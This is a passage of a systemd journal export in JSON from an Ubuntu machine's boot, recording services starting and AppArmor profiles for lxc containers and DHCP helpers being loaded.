"/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "UNIT" : "plymouth-read-write.service", "INVOCATION_ID" : "bb9896e20e1245a5accc30ae97de9802", "MESSAGE" : "Started Tell Plymouth To Write Out Runtime Data.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280781168846" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=200;b=e2b08827b5804427b422c10c84f1567e;m=693d51;t=5bd16dd2cbcb9;x=764810199645f137", "__REALTIME_TIMESTAMP" : "1615280781180089", "__MONOTONIC_TIMESTAMP" : "6896977", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "UNIT" : "systemd-machine-id-commit.service", "INVOCATION_ID" : "a7cc3d2edc2d455f8262a9365ac0e1e2", "MESSAGE" : "Started Commit a transient machine-id on disk.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280781177172" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=201;b=e2b08827b5804427b422c10c84f1567e;m=69599e;t=5bd16dd2cd905;x=c708d5829a4ceea3", "__REALTIME_TIMESTAMP" : "1615280781187333", "__MONOTONIC_TIMESTAMP" : "6904222", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : 
"e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "UNIT" : "systemd-tmpfiles-setup.service", "INVOCATION_ID" : "5e70a567d5ea41bca036432fe845e916", "MESSAGE" : "Started Create Volatile Files and Directories.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280781184338" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=202;b=e2b08827b5804427b422c10c84f1567e;m=6978e6;t=5bd16dd2cf84d;x=1302676ed9c7dd18", "__REALTIME_TIMESTAMP" : "1615280781195341", "__MONOTONIC_TIMESTAMP" : "6912230", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", "CODE_LINE" : "1718", "CODE_FUNC" : "unit_status_log_starting_stopping_reloading", "MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "MESSAGE" : "Starting Update UTMP about System Boot/Shutdown...", "UNIT" : "systemd-update-utmp.service", "INVOCATION_ID" : "4d1e0aa27016434c8dd74250bc4a0327", "_SOURCE_REALTIME_TIMESTAMP" : "1615280781192809" } { "__CURSOR" : 
"s=d9fa7adefbe34ae1aa61d7656b4137d4;i=203;b=e2b08827b5804427b422c10c84f1567e;m=699f7c;t=5bd16dd2d1ee3;x=c7aed6302cee302f", "__REALTIME_TIMESTAMP" : "1615280781205219", "__MONOTONIC_TIMESTAMP" : "6922108", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", "CODE_LINE" : "1718", "CODE_FUNC" : "unit_status_log_starting_stopping_reloading", "MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "MESSAGE" : "Starting Network Time Synchronization...", "UNIT" : "systemd-timesyncd.service", "INVOCATION_ID" : "02dc978d5d9147908ffca7c0020b3270", "_SOURCE_REALTIME_TIMESTAMP" : "1615280781203129" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=204;b=e2b08827b5804427b422c10c84f1567e;m=69f639;t=5bd16dd2d75a0;x=9d78d1321ca2756", "__REALTIME_TIMESTAMP" : "1615280781227424", "__MONOTONIC_TIMESTAMP" : "6944313", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : 
"39f53479d3a045ac8e11786248231fbf", "UNIT" : "systemd-update-utmp.service", "INVOCATION_ID" : "4d1e0aa27016434c8dd74250bc4a0327", "MESSAGE" : "Started Update UTMP about System Boot/Shutdown.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280781224990" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=205;b=e2b08827b5804427b422c10c84f1567e;m=6a826a;t=5bd16dd2e01d1;x=b54240324bbd03a7", "__REALTIME_TIMESTAMP" : "1615280781263313", "__MONOTONIC_TIMESTAMP" : "6980202", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "_STREAM_ID" : "22889c4a7791419087171fcdbc582566", "SYSLOG_IDENTIFIER" : "apparmor", "MESSAGE" : " * Starting AppArmor profiles", "_PID" : "494", "_COMM" : "apparmor", "_EXE" : "/bin/dash", "_CMDLINE" : "/bin/sh /etc/init.d/apparmor start", "_SYSTEMD_CGROUP" : "/system.slice/apparmor.service", "_SYSTEMD_UNIT" : "apparmor.service", "_SYSTEMD_INVOCATION_ID" : "b73e15f39a704474b132a5d88c306fdb" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=206;b=e2b08827b5804427b422c10c84f1567e;m=6ae1af;t=5bd16dd2e6116;x=50c94c5dd5eeb412", "__REALTIME_TIMESTAMP" : "1615280781287702", "__MONOTONIC_TIMESTAMP" : "7004591", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : 
"job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "UNIT" : "ebtables.service", "INVOCATION_ID" : "ca659a18573443f4b7253369397d23c9", "MESSAGE" : "Started ebtables ruleset management.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280781284952" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=207;b=e2b08827b5804427b422c10c84f1567e;m=6c3082;t=5bd16dd2fafe9;x=7df85c9a8de74e58", "__REALTIME_TIMESTAMP" : "1615280781373417", "__MONOTONIC_TIMESTAMP" : "7090306", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "UNIT" : "systemd-timesyncd.service", "INVOCATION_ID" : "02dc978d5d9147908ffca7c0020b3270", "MESSAGE" : "Started Network Time Synchronization.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280781368527" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=208;b=e2b08827b5804427b422c10c84f1567e;m=6c30fa;t=5bd16dd2fb061;x=3716d06186f5c01e", "__REALTIME_TIMESTAMP" : "1615280781373537", "__MONOTONIC_TIMESTAMP" : "7090426", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : 
"/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "MESSAGE" : "Reached target System Time Synchronized.", "UNIT" : "time-sync.target", "INVOCATION_ID" : "f36253b2c17d489dabcad39f82479ebc", "_SOURCE_REALTIME_TIMESTAMP" : "1615280781371007" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=209;b=e2b08827b5804427b422c10c84f1567e;m=70e9c0;t=5bd16dd346927;x=90e2c516be7e04e9", "__REALTIME_TIMESTAMP" : "1615280781682983", "__MONOTONIC_TIMESTAMP" : "7399872", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_TRANSPORT" : "audit", "_SOURCE_REALTIME_TIMESTAMP" : "1615280781676000", "_AUDIT_TYPE" : "1400", "_AUDIT_ID" : "2", "SYSLOG_FACILITY" : "4", "SYSLOG_IDENTIFIER" : "audit", "MESSAGE" : "AVC apparmor=\"STATUS\" operation=\"profile_load\" profile=\"unconfined\" name=\"lxc-container-default\" pid=523 comm=\"apparmor_parser\"", "_AUDIT_FIELD_APPARMOR" : "\"STATUS\"", "_AUDIT_FIELD_OPERATION" : "\"profile_load\"", "_AUDIT_FIELD_PROFILE" : "\"unconfined\"", "_AUDIT_FIELD_NAME" : "lxc-container-default", "_PID" : "523", "_COMM" : "apparmor_parser" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=20a;b=e2b08827b5804427b422c10c84f1567e;m=70ea9f;t=5bd16dd346a06;x=9c867e315db79cb9", "__REALTIME_TIMESTAMP" : "1615280781683206", "__MONOTONIC_TIMESTAMP" : "7400095", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "PRIORITY" : "5", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_SOURCE_MONOTONIC_TIMESTAMP" : "7399857", "MESSAGE" : "audit: type=1400 
audit(1615280781.676:2): apparmor=\"STATUS\" operation=\"profile_load\" profile=\"unconfined\" name=\"lxc-container-default\" pid=523 comm=\"apparmor_parser\"" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=20b;b=e2b08827b5804427b422c10c84f1567e;m=70ecd7;t=5bd16dd346c3f;x=2c21b58f3c40574f", "__REALTIME_TIMESTAMP" : "1615280781683775", "__MONOTONIC_TIMESTAMP" : "7400663", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_TRANSPORT" : "audit", "_AUDIT_TYPE" : "1400", "SYSLOG_FACILITY" : "4", "SYSLOG_IDENTIFIER" : "audit", "_AUDIT_FIELD_APPARMOR" : "\"STATUS\"", "_AUDIT_FIELD_OPERATION" : "\"profile_load\"", "_AUDIT_FIELD_PROFILE" : "\"unconfined\"", "_PID" : "523", "_COMM" : "apparmor_parser", "_SOURCE_REALTIME_TIMESTAMP" : "1615280781680000", "_AUDIT_ID" : "3", "MESSAGE" : "AVC apparmor=\"STATUS\" operation=\"profile_load\" profile=\"unconfined\" name=\"lxc-container-default-cgns\" pid=523 comm=\"apparmor_parser\"", "_AUDIT_FIELD_NAME" : "lxc-container-default-cgns" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=20c;b=e2b08827b5804427b422c10c84f1567e;m=70f799;t=5bd16dd347700;x=9b608a14e0fbea31", "__REALTIME_TIMESTAMP" : "1615280781686528", "__MONOTONIC_TIMESTAMP" : "7403417", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_TRANSPORT" : "audit", "_AUDIT_TYPE" : "1400", "SYSLOG_FACILITY" : "4", "SYSLOG_IDENTIFIER" : "audit", "_AUDIT_FIELD_APPARMOR" : "\"STATUS\"", "_AUDIT_FIELD_OPERATION" : "\"profile_load\"", "_AUDIT_FIELD_PROFILE" : "\"unconfined\"", "_PID" : "523", "_COMM" : "apparmor_parser", "_SOURCE_REALTIME_TIMESTAMP" : "1615280781680000", "_AUDIT_ID" : "4", "MESSAGE" : "AVC apparmor=\"STATUS\" operation=\"profile_load\" profile=\"unconfined\" name=\"lxc-container-default-with-mounting\" pid=523 comm=\"apparmor_parser\"", "_AUDIT_FIELD_NAME" : "lxc-container-default-with-mounting" } { 
"__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=20d;b=e2b08827b5804427b422c10c84f1567e;m=70fa3e;t=5bd16dd3479a5;x=89a99b7b754d8e8b", "__REALTIME_TIMESTAMP" : "1615280781687205", "__MONOTONIC_TIMESTAMP" : "7404094", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "PRIORITY" : "5", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_SOURCE_MONOTONIC_TIMESTAMP" : "7400658", "MESSAGE" : "audit: type=1400 audit(1615280781.680:3): apparmor=\"STATUS\" operation=\"profile_load\" profile=\"unconfined\" name=\"lxc-container-default-cgns\" pid=523 comm=\"apparmor_parser\"" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=20e;b=e2b08827b5804427b422c10c84f1567e;m=70fa68;t=5bd16dd3479cf;x=a19f71accf09174", "__REALTIME_TIMESTAMP" : "1615280781687247", "__MONOTONIC_TIMESTAMP" : "7404136", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "PRIORITY" : "5", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_SOURCE_MONOTONIC_TIMESTAMP" : "7403411", "MESSAGE" : "audit: type=1400 audit(1615280781.680:4): apparmor=\"STATUS\" operation=\"profile_load\" profile=\"unconfined\" name=\"lxc-container-default-with-mounting\" pid=523 comm=\"apparmor_parser\"" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=20f;b=e2b08827b5804427b422c10c84f1567e;m=70fab6;t=5bd16dd347a1e;x=531b7de5d920da5d", "__REALTIME_TIMESTAMP" : "1615280781687326", "__MONOTONIC_TIMESTAMP" : "7404214", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_TRANSPORT" : "audit", "_AUDIT_TYPE" : "1400", "SYSLOG_FACILITY" : "4", "SYSLOG_IDENTIFIER" : "audit", "_AUDIT_FIELD_APPARMOR" : "\"STATUS\"", "_AUDIT_FIELD_OPERATION" : "\"profile_load\"", "_AUDIT_FIELD_PROFILE" : "\"unconfined\"", "_PID" : "523", "_COMM" : "apparmor_parser", 
"_SOURCE_REALTIME_TIMESTAMP" : "1615280781684000", "_AUDIT_ID" : "5", "MESSAGE" : "AVC apparmor=\"STATUS\" operation=\"profile_load\" profile=\"unconfined\" name=\"lxc-container-default-with-nesting\" pid=523 comm=\"apparmor_parser\"", "_AUDIT_FIELD_NAME" : "lxc-container-default-with-nesting" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=210;b=e2b08827b5804427b422c10c84f1567e;m=7109e4;t=5bd16dd34894c;x=1bb336b25c13feeb", "__REALTIME_TIMESTAMP" : "1615280781691212", "__MONOTONIC_TIMESTAMP" : "7408100", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "PRIORITY" : "5", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_SOURCE_MONOTONIC_TIMESTAMP" : "7404210", "MESSAGE" : "audit: type=1400 audit(1615280781.684:5): apparmor=\"STATUS\" operation=\"profile_load\" profile=\"unconfined\" name=\"lxc-container-default-with-nesting\" pid=523 comm=\"apparmor_parser\"" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=211;b=e2b08827b5804427b422c10c84f1567e;m=740920;t=5bd16dd378887;x=4e977cd2df564d8e", "__REALTIME_TIMESTAMP" : "1615280781887623", "__MONOTONIC_TIMESTAMP" : "7604512", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_TRANSPORT" : "audit", "_AUDIT_TYPE" : "1400", "SYSLOG_FACILITY" : "4", "SYSLOG_IDENTIFIER" : "audit", "_AUDIT_FIELD_APPARMOR" : "\"STATUS\"", "_AUDIT_FIELD_OPERATION" : "\"profile_load\"", "_AUDIT_FIELD_PROFILE" : "\"unconfined\"", "_COMM" : "apparmor_parser", "_SOURCE_REALTIME_TIMESTAMP" : "1615280781884000", "_AUDIT_ID" : "6", "MESSAGE" : "AVC apparmor=\"STATUS\" operation=\"profile_load\" profile=\"unconfined\" name=\"/sbin/dhclient\" pid=527 comm=\"apparmor_parser\"", "_AUDIT_FIELD_NAME" : "/sbin/dhclient", "_PID" : "527" } { "__CURSOR" : 
"s=d9fa7adefbe34ae1aa61d7656b4137d4;i=212;b=e2b08827b5804427b422c10c84f1567e;m=740c10;t=5bd16dd378b78;x=392dcb54c67371c2", "__REALTIME_TIMESTAMP" : "1615280781888376", "__MONOTONIC_TIMESTAMP" : "7605264", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_TRANSPORT" : "audit", "_AUDIT_TYPE" : "1400", "SYSLOG_FACILITY" : "4", "SYSLOG_IDENTIFIER" : "audit", "_AUDIT_FIELD_APPARMOR" : "\"STATUS\"", "_AUDIT_FIELD_OPERATION" : "\"profile_load\"", "_AUDIT_FIELD_PROFILE" : "\"unconfined\"", "_COMM" : "apparmor_parser", "_SOURCE_REALTIME_TIMESTAMP" : "1615280781884000", "_PID" : "527", "_AUDIT_ID" : "7", "MESSAGE" : "AVC apparmor=\"STATUS\" operation=\"profile_load\" profile=\"unconfined\" name=\"/usr/lib/NetworkManager/nm-dhcp-client.action\" pid=527 comm=\"apparmor_parser\"", "_AUDIT_FIELD_NAME" : "/usr/lib/NetworkManager/nm-dhcp-client.action" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=213;b=e2b08827b5804427b422c10c84f1567e;m=740e5e;t=5bd16dd378dc6;x=9a77ee7cec693e7e", "__REALTIME_TIMESTAMP" : "1615280781888966", "__MONOTONIC_TIMESTAMP" : "7605854", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_TRANSPORT" : "audit", "_AUDIT_TYPE" : "1400", "SYSLOG_FACILITY" : "4", "SYSLOG_IDENTIFIER" : "audit", "_AUDIT_FIELD_APPARMOR" : "\"STATUS\"", "_AUDIT_FIELD_OPERATION" : "\"profile_load\"", "_AUDIT_FIELD_PROFILE" : "\"unconfined\"", "_COMM" : "apparmor_parser", "_SOURCE_REALTIME_TIMESTAMP" : "1615280781884000", "_PID" : "527", "_AUDIT_ID" : "8", "MESSAGE" : "AVC apparmor=\"STATUS\" operation=\"profile_load\" profile=\"unconfined\" name=\"/usr/lib/NetworkManager/nm-dhcp-helper\" pid=527 comm=\"apparmor_parser\"", "_AUDIT_FIELD_NAME" : "/usr/lib/NetworkManager/nm-dhcp-helper" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=214;b=e2b08827b5804427b422c10c84f1567e;m=7410ae;t=5bd16dd379015;x=ada4a1831bf5991d", 
"__REALTIME_TIMESTAMP" : "1615280781889557", "__MONOTONIC_TIMESTAMP" : "7606446", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_TRANSPORT" : "audit", "_AUDIT_TYPE" : "1400", "SYSLOG_FACILITY" : "4", "SYSLOG_IDENTIFIER" : "audit", "_AUDIT_FIELD_APPARMOR" : "\"STATUS\"", "_AUDIT_FIELD_OPERATION" : "\"profile_load\"", "_AUDIT_FIELD_PROFILE" : "\"unconfined\"", "_COMM" : "apparmor_parser", "_SOURCE_REALTIME_TIMESTAMP" : "1615280781884000", "_PID" : "527", "_AUDIT_ID" : "9", "MESSAGE" : "AVC apparmor=\"STATUS\" operation=\"profile_load\" profile=\"unconfined\" name=\"/usr/lib/connman/scripts/dhclient-script\" pid=527 comm=\"apparmor_parser\"", "_AUDIT_FIELD_NAME" : "/usr/lib/connman/scripts/dhclient-script" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=215;b=e2b08827b5804427b422c10c84f1567e;m=741713;t=5bd16dd37967a;x=201ee3deb2c44ea4", "__REALTIME_TIMESTAMP" : "1615280781891194", "__MONOTONIC_TIMESTAMP" : "7608083", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "PRIORITY" : "5", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_SOURCE_MONOTONIC_TIMESTAMP" : "7604498", "MESSAGE" : "audit: type=1400 audit(1615280781.884:6): apparmor=\"STATUS\" operation=\"profile_load\" profile=\"unconfined\" name=\"/sbin/dhclient\" pid=527 comm=\"apparmor_parser\"" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=216;b=e2b08827b5804427b422c10c84f1567e;m=74176c;t=5bd16dd3796d4;x=713739dbd95eae3", "__REALTIME_TIMESTAMP" : "1615280781891284", "__MONOTONIC_TIMESTAMP" : "7608172", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "PRIORITY" : "5", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_SOURCE_MONOTONIC_TIMESTAMP" : "7605258", "MESSAGE" : "audit: type=1400 
audit(1615280781.884:7): apparmor=\"STATUS\" operation=\"profile_load\" profile=\"unconfined\" name=\"/usr/lib/NetworkManager/nm-dhcp-client.action\" pid=527 comm=\"apparmor_parser\"" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=217;b=e2b08827b5804427b422c10c84f1567e;m=7417b9;t=5bd16dd379720;x=774be3c5b932a4a9", "__REALTIME_TIMESTAMP" : "1615280781891360", "__MONOTONIC_TIMESTAMP" : "7608249", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "PRIORITY" : "5", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_SOURCE_MONOTONIC_TIMESTAMP" : "7605849", "MESSAGE" : "audit: type=1400 audit(1615280781.884:8): apparmor=\"STATUS\" operation=\"profile_load\" profile=\"unconfined\" name=\"/usr/lib/NetworkManager/nm-dhcp-helper\" pid=527 comm=\"apparmor_parser\"" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=218;b=e2b08827b5804427b422c10c84f1567e;m=7417da;t=5bd16dd379741;x=ca3690b9ca2053ef", "__REALTIME_TIMESTAMP" : "1615280781891393", "__MONOTONIC_TIMESTAMP" : "7608282", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "PRIORITY" : "5", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_SOURCE_MONOTONIC_TIMESTAMP" : "7606441", "MESSAGE" : "audit: type=1400 audit(1615280781.884:9): apparmor=\"STATUS\" operation=\"profile_load\" profile=\"unconfined\" name=\"/usr/lib/connman/scripts/dhclient-script\" pid=527 comm=\"apparmor_parser\"" } { 